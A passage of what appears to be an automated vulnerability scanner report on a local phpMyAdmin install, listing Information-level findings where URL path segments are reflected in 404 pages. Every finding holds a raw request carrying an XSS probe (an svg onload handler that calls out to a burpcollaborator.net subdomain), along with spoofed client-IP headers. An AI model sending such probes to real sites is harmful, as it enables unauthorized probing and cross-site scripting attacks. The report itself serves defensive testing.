Path:   /phpmyadmin/js/cross_framing_protection.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/js23no274fpr/cross_framing_protection.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:17 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js23no274fpr/cross_framing_protection.js was not found on this server.</p>
...[SNIP]...
19.230. http://localhost/phpmyadmin/js/doclinks.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/doclinks.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//2or5eobwbt4pgnh0tdibkkrcj3pydpif67wvnnady2%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//2or5eobwbt4pgnh0tdibkkrcj3pydpif67wvnnady2\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.231. http://localhost/phpmyadmin/js/doclinks.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/doclinks.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//716arto1oyhutsu56ivgxp4hw823quvkjc906nwbl%5c56burpcollaborator.net'%3e/js/doclinks.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//716arto1oyhutsu56ivgxp4hw823quvkjc906nwbl\56burpcollaborator.net'&gt;/js/doclinks.js was not found on this server.</p>
...[SNIP]...
19.232. http://localhost/phpmyadmin/js/doclinks.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/doclinks.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//dxegnzk7k4d0pyqb2ormtv0nsey9m0rqfi562tthi%5c56burpcollaborator.net'%3e/doclinks.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 421
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//dxegnzk7k4d0pyqb2ormtv0nsey9m0rqfi562tthi\56burpcollaborator.net'&gt;/doclinks.js was not found on this server.</p>
...[SNIP]...
19.233. http://localhost/phpmyadmin/js/error_report.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/error_report.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//zsv2ilftfq8mkklxxam8ohv9n0tvhmmea60urmec21%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//zsv2ilftfq8mkklxxam8ohv9n0tvhmmea60urmec21\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.234. http://localhost/phpmyadmin/js/error_report.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/error_report.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//8enb4u121zuv6t76jj8haqhi99f43v8nwfm3jq9ey%5c56burpcollaborator.net'%3e/js/error_report.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 417
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//8enb4u121zuv6t76jj8haqhi99f43v8nwfm3jq9ey\56burpcollaborator.net'&gt;/js/error_report.js was not found on this server.</p>
...[SNIP]...
19.235. http://localhost/phpmyadmin/js/error_report.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/error_report.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//an1ddwa4a13xfvg8slhjjsqkibo6cxhp5hv5ssjg8%5c56burpcollaborator.net'%3e/error_report.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 425
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//an1ddwa4a13xfvg8slhjjsqkibo6cxhp5hv5ssjg8\56burpcollaborator.net'&gt;/error_report.js was not found on this server.</p>
...[SNIP]...
19.236. http://localhost/phpmyadmin/js/functions.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/functions.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//whhz7i4q4nxj9haum7b5dek6cxis6jbgz8pwgo3er3%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//whhz7i4q4nxj9haum7b5dek6cxis6jbgz8pwgo3er3\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.237. http://localhost/phpmyadmin/js/functions.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/functions.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//z552vlstsqlmxkyxaaz81h89006vumzjnbdzam0ap%5c56burpcollaborator.net'%3e/js/functions.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 414
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//z552vlstsqlmxkyxaaz81h89006vumzjnbdzam0ap\56burpcollaborator.net'&gt;/js/functions.js was not found on this server.</p>
...[SNIP]...
19.238. http://localhost/phpmyadmin/js/functions.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/functions.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//w52zvisqsnljxhyua7z51e860x6sujzgn8dwaj17q%5c56burpcollaborator.net'%3e/functions.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 422
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//w52zvisqsnljxhyua7z51e860x6sujzgn8dwaj17q\56burpcollaborator.net'&gt;/functions.js was not found on this server.</p>
...[SNIP]...
19.239. http://localhost/phpmyadmin/js/indexes.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/indexes.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//0kl3am7u7r0ncldypbe9ginaf1lw9nep2hs5jx6nuc%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//0kl3am7u7r0ncldypbe9ginaf1lw9nep2hs5jx6nuc\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.240. http://localhost/phpmyadmin/js/indexes.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/indexes.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//1874ynvvvsoo0m1zdc2a4jbb329xxo2qqig6dt3hs%5c56burpcollaborator.net'%3e/js/indexes.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 412
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//1874ynvvvsoo0m1zdc2a4jbb329xxo2qqig6dt3hs\56burpcollaborator.net'&gt;/js/indexes.js was not found on this server.</p>
...[SNIP]...
19.241. http://localhost/phpmyadmin/js/indexes.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/indexes.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//7v3alti1iybunso50ipgrpyhq8w3kupwdo3c0zrng%5c56burpcollaborator.net'%3e/indexes.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 420
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//7v3alti1iybunso50ipgrpyhq8w3kupwdo3c0zrng\56burpcollaborator.net'&gt;/indexes.js was not found on this server.</p>
...[SNIP]...
19.242. http://localhost/phpmyadmin/js/keyhandler.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/keyhandler.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//fxgin1k9k6d2p0qd2qrotx0psgybm3cx0pqdh54vsk%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//fxgin1k9k6d2p0qd2qrotx0psgybm3cx0pqdh54vsk\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.243. http://localhost/phpmyadmin/js/keyhandler.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/keyhandler.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//817bruo2ozhvttu66jvhxq4iw924qwgq4iu6rthh6%5c56burpcollaborator.net'%3e/js/keyhandler.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 415
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//817bruo2ozhvttu66jvhxq4iw924qwgq4iu6rthh6\56burpcollaborator.net'&gt;/js/keyhandler.js was not found on this server.</p>
...[SNIP]...
19.244. http://localhost/phpmyadmin/js/keyhandler.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/keyhandler.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//7goa6t313ywu8s95liagcpjhb8h35vvpjh956sxgm%5c56burpcollaborator.net'%3e/keyhandler.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 423
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//7goa6t313ywu8s95liagcpjhb8h35vvpjh956sxgm\56burpcollaborator.net'&gt;/keyhandler.js was not found on this server.</p>
...[SNIP]...
19.245. http://localhost/phpmyadmin/js/menu-resizer.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/menu-resizer.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//n3rqt9qhqejav8wl8yxwz56xyo4jsbi961wpnha7yw%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//n3rqt9qhqejav8wl8yxwz56xyo4jsbi961wpnha7yw\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.246. http://localhost/phpmyadmin/js/menu-resizer.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/menu-resizer.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//1eg44n1v1suo6m7zjc8aajhb92fx3ptnhf734quej%5c56burpcollaborator.net'%3e/js/menu-resizer.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 417
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//1eg44n1v1suo6m7zjc8aajhb92fx3ptnhf734quej\56burpcollaborator.net'&gt;/js/menu-resizer.js was not found on this server.</p>
...[SNIP]...
19.247. http://localhost/phpmyadmin/js/menu-resizer.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/menu-resizer.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//swsvmejmjjcfodpq13q1saz2rtxolgbez6pumhd52%5c56burpcollaborator.net'%3e/menu-resizer.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 425
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//swsvmejmjjcfodpq13q1saz2rtxolgbez6pumhd52\56burpcollaborator.net'&gt;/menu-resizer.js was not found on this server.</p>
...[SNIP]...
19.248. http://localhost/phpmyadmin/js/messages.php [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/messages.php

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//qe8t4c1k1hud6b7oj18za8h09rfm3etdh57tyllb90%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:26 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//qe8t4c1k1hud6b7oj18za8h09rfm3etdh57tyllb90\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.249. http://localhost/phpmyadmin/js/messages.php [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/messages.php

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//gvfjl2iai7b3n1oe0rppryyqqhwck4a3yvojl6bu0%5c56burpcollaborator.net'%3e/js/messages.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:26 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 414
Connection: close
